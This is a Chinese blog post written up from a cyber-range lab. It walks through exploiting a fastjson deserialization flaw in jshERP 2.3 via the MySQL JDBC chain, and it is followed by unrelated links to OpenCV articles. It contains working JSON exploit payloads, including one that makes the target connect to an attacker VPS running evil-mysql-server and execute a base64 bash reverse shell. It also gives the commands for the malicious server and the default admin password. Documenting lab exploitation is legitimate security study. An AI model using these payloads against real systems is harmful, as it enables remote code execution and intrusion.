fastjson 反序列化之mysql JDBC 利用

最新推荐文章于 2025-04-01 15:29:18 发布
最新推荐文章于 2025-04-01 15:29:18 发布
阅读量4.1k 收藏 7
点赞数 3
分类专栏: 笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42077227/article/details/130236560
版权

前言:
在打春秋云境Exchange 靶场时,入口点是华夏ERP 2.3版本系统,存在fastjson 反序列化漏洞,在尝试常见的fastjson利用链反弹shell都没有反应,最终使用mysql JDBC利用链反弹shell成功。在此记录一下。

复现本地靶场搭建

在打靶场过程中,迟迟没有利用成功,在本地搭建靶场先进行反序列化利用测试,github下载jshERP-2.3版本源码。
本地用到的工具和数据库环境:

1. IntelliJ IDEA 2020.3.2(使用tomcat 8.5.34,jdk8)
2. 10.3.7-MariaDB(mysql 5.7

1、使用IDEA打开下载的jshERP-2.3项目源码,修改配置文件

修改application.properties配置文件的数据库连接用户密码

在这里插入图片描述

我这里使用的tomcat为8.5.34版本

在这里插入图片描述

2、导入数据库

本地创建jsh_erp数据库,导入jsh_erp.sql文件执行生成表数据

在这里插入图片描述

3、运行靶场

运行ErpApplication 入口文件,启动靶场,无报错成功运行。

在这里插入图片描述

4、反序列化利用

靶场入口是华夏ERP系统,默认管理员账号密码可以进行登录:admin/123456

在这里插入图片描述
登录到后台,华夏ERP系统历史版本中存在很多漏洞的,包括fastjson 反序列化漏洞,这里在用户管理查询中触发

在这里插入图片描述

验证fastjson 反序列化漏洞存在payload:


{"@type":"java.net.Inet4Address","val":"fvnp2k.dnslog.cn"}
进行url编码后在search值发送

burp中进行数据包发送
在这里插入图片描述
dnslog收到消息
在这里插入图片描述

后续中在利用fastjson 反序列化执行命令都是无一失败,IDEA中看到都是类似失败提示not support com.sun.rowset.JdbcRowSetImpl,不支持这些利用链如下,还有更多的这里没有列出来

exp:
{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"rmi://xxx.xx.xx.xx:1099/Exploit", "autoCommit":true
}

在这里插入图片描述

在搜索fastjson 反序列化与JDBC之后发现可以使用fastjson加mysql反序列化,细看了解之后复现测试
参考1:

在这里插入图片描述

http://www.bmth666.cn/bmth_blog/2022/10/19/Fastjson%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/#%E8%93%9D%E5%B8%BD%E6%9D%AF2022%E5%86%B3%E8%B5%9B-%E8%B5%8C%E6%80%AA

参考2:
在这里插入图片描述

https://www.cnblogs.com/kingbridge/articles/16720318.html

从华夏ERP源码配置使用的依赖符合触发条件

在这里插入图片描述

evil-mysql-server、ysoserial-all.jar

在复现中需要使用到evil-mysql-server、ysoserial-all.jar 反序列化利用工具

evil-mysql-server是一个针对 jdbc 反序列化漏洞编写的恶意数据库,依赖 ysoserial
在这里插入图片描述

ysoserial-all.jar: java反序列利用神器

下载地址:
https://github.com/dushixiang/evil-mysql-server
https://github.com/su18/ysoserial

反弹shell

在vps服务器上下载evil-mysql-server、ysoserial-all.jar工具回来放在同一目录下,执行命令运行

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar

用到的Fastjson 反序列化exp ,只需要修改vpsIP地址和要执行的命令(base64编码后的命令)

{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "vpsIP地址",
		"portToConnectTo": 3306,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,base64编码后的命令}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}

url编码后发送

在这里插入图片描述

vps中收到了数据请求,由于靶场是windows系统不能反弹shell,但是可以看到靶场服务器向vps请求, 执行了恶意的反序列化代码

在这里插入图片描述

最后发现可行之后,也是立马开启了春秋云境Exchange 靶场,使用fastjson+mysql JDBC利用链反弹shell成功

在这里插入图片描述
在这里插入图片描述

OpenCV笔记总结 (上)
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
03-28 8818
本系列主要介绍计算机视觉图像处理方向,分为上中下三部分文章,本篇主要详解OpenCV基础方向知识及操作,参考开源资料对OpenCV进行总结,后续将继续更新,适合CV方向同学学习
贾志刚OpenCV3.3深度神经网络DNN模块应用学习笔记
qq_32809093的博客
08-23 2127
1 概述 - DNN模块介绍 1.1 环境配置  下载与配置OpenCV3.3  OpenCV3.3下载  包括头文件: D:\opencv-3.3\opencv\build\include D:\opencv-3.3\opencv\build\include\opencv D:\opencv-3.3\opencv\build\include\opencv2  库文件 D:\opencv-3.3\opencv\build\x64\vc14\lib  链接器 opencv_world330d.
opencv_C++学习1
m0_56667427的博客
08-13 258
1.opencv环境搭建 演示代码: #include<opencv2/opencv.hpp> #include<iostream> #include<math.h> using namespace cv; int main(int argc, char** argv) { Mat src = imread("C:/ERRT/c16d7c94363dc0f6e95e46187605e803.jpg"); if (src.empty()) { printf
C++ opencv 学习
weixin_45715405的博客
03-03 1333
如果norm_type为其他类型,则为归一化要乘的系数。函数原型,归一化类型,常见的有NORM_L1, NORM_L2, NORM_INF, NORM_MINMAX,不同的norm计算方式不一样。原理:取卷积核的中位数,作为卷积核的结果,当卷积核在图像上进行移动,获取到的数之后进行排序,取中位数作为卷积核的结果。边缘处的二阶导数=0,我们可以利用这一特征去寻找图像的边缘,注意:二阶导数为0的位子也可能是无意义的位置(噪声)h2是卷积之后的高度,h1是原图像高度,f卷积核高度,p是填充多少,s是卷积核步长。
OpenCV的常用用法(C++版)
最新发布
qq_56187001的博客
04-01 730
-返回值:无--参数:--InputArray image:传入的图片名称--OutputArray edges:传出的图片名称如果有具体的数在括号里输入--double fx = 0, double fy = 0:如果没有具体的数,后面两位是按照比例进行缩放。
c++ opencv学习
weixin_41985687的博客
08-02 803
opencv C++教程
opencv_c++学习(一)
qq_52302919的博客
04-04 637
opencv_c++的环境搭建
opencv c++学习一(基础认识)
m0_62309595的博客
01-30 950
一、加载图像 二、显示图像 三、修改图像 四、保存图片
图像处理--OpenCV学习笔记
Prime me的博客
02-04 3263
OpenCV
OpenCV学习笔记之图像处理与人脸检测
weixin_50260062的博客
07-22 2452
1.1访问摄像头: 在OpenCV中,通过cv::VideoCapture对象的open()方法可访问摄像头或者相机设备。 #include<iostream> #include<opencv2/opencv.hpp> using namespace std; using namespace cv; void main(int argc,char *argv[]){ auto cameraNumber = 0; if(argc > 1)...
安卓学习笔记-unity调用原生opencv的sdk
pure81的博客
09-09 1828
保存本地图片的方法我是在网上扒的,网上在安卓10以后都可以访问到DCIM文件夹了,他们也大多都是使用的这个方法,但unity是不支持访问这些路径的,所以我还是改成了保存到报名下的私有路径中,这样unity就可以直接通过Application.persistdatapath这个api去访问文件了。,然后打包运行,会出现一个显示相机画面的界面,检测到人脸就会自动在人脸的部分绘制一个框框,这和unity的插件效果是一致的,然后打包到安卓主板(3588和3568)上进行测试,也是可以正常检测到的。
C++ OPenCV中文版学习
11-03
OPencv入门及深入详细介绍,对初学者很有作用。
opencv+c++
12-18
CT图像重建系统、数图像水印系统、遥感图像配准系统、图像检索系统、细胞检测与计数系统、指纹提取与识别系统、人脸检测与识别系统、运动车辆检测跟踪系统、车型识别系统、车牌识别系统
opencv c++代码
10-16
opencv c++代码
opencv_c++学习(三十)
qq_52302919的博客
05-30 1022
model:模型文件名称config:配置文件名称framework:框架种类blob:新的输入数据,数据类型为CV_32F或CV_8U。name:输入网络层的名称。scalefactor:可选的标准化比例(尺寸缩放)。mean:可选的减数数值(平移)。
OPENCV c++
qq_19833853的博客
12-18 629
本周学习计划 1.图像旋转(不产生断点); 2.补充连通域算法(找出连通域、标记、识别); 3.基于拓扑结构的特征特区(难点); 4.鸡啄米 第四部分:类与对象 第五部分:C++程序设计必知; 5.C++primer第三章(符串、向量、数组);
opencv c++
qq_38173035的博客
07-17 206
读取图像使用imread()函数, Mat image = imread("demo.jpg",IMREAD_COLOR); 在读取时,还能够自行选择图像的读取格式,常用的有灰度图像:IMREAD_GRAYSCALE和RGB图像:IMREAD_COLOR。 Mat是Opencv经过高度优化的数据结构,它自带了内存管理,可以通过检测引用数来释放不需要的内存。同时它的赋值操作也分为浅赋值和深复制,浅赋值能够不必复制大量的数据,从而提高程序的性能,最好只在需要深复制时在进行深复制。 在赋值或者初始化时,使
opencv C++
weixin_38241876的博客
03-05 393
【代码】opencv C++
openCVc++
热门推荐
zeven_yun的博客
05-09 1万+
opencv c++ 配置
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值